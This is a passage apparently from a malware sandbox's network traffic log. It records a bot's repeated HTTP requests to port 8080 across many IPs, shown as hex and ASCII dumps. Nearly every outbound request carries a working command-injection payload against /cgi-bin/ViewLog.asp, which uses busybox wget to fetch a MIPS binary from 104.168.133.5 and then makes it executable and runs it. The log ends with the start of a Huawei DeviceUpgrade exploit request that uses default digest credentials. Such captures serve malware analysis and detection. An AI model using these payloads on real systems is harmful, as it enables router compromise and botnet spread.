                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              784192.168.2.134431662.171.183.2488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.250495911 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              785192.168.2.135261694.123.181.728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.271646023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              786192.168.2.135107831.136.86.958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.417597055 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.582145929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              787192.168.2.135486285.194.34.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.428397894 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              788192.168.2.135485294.122.211.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.464185953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              789192.168.2.135455662.29.83.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.464184046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              790192.168.2.135359694.120.251.708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.464202881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              791192.168.2.1352454106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.539443016 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 32 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:26Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              792192.168.2.135500431.43.179.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.833301067 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              793192.168.2.135495885.194.34.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.838267088 CET221INHTTP/1.1 400 Bad Request
                                              Server: micro_httpd
                                              Cache-Control: no-cache
                                              Date: Thu, 23 Nov 2023 04:18:27 GMT
                                              Content-Type: text/html
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              794192.168.2.134263085.241.114.778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.839757919 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              795192.168.2.134912462.29.122.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.853548050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              796192.168.2.133956431.136.61.168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.885845900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.094166040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              797192.168.2.134897094.121.157.258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.057220936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              798192.168.2.1333876154.64.18.7723
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.120176077 CET207INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:18Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              799192.168.2.1352508106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.212790966 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 32 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:27Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              800192.168.2.134928694.110.184.1388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.353562117 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.950176001 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              801192.168.2.1333892154.64.18.7723
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.468574047 CET207INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:18Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              802192.168.2.135959262.145.136.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.764799118 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.976315975 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:18:18 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              803192.168.2.1350944156.230.30.15437215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.773201942 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
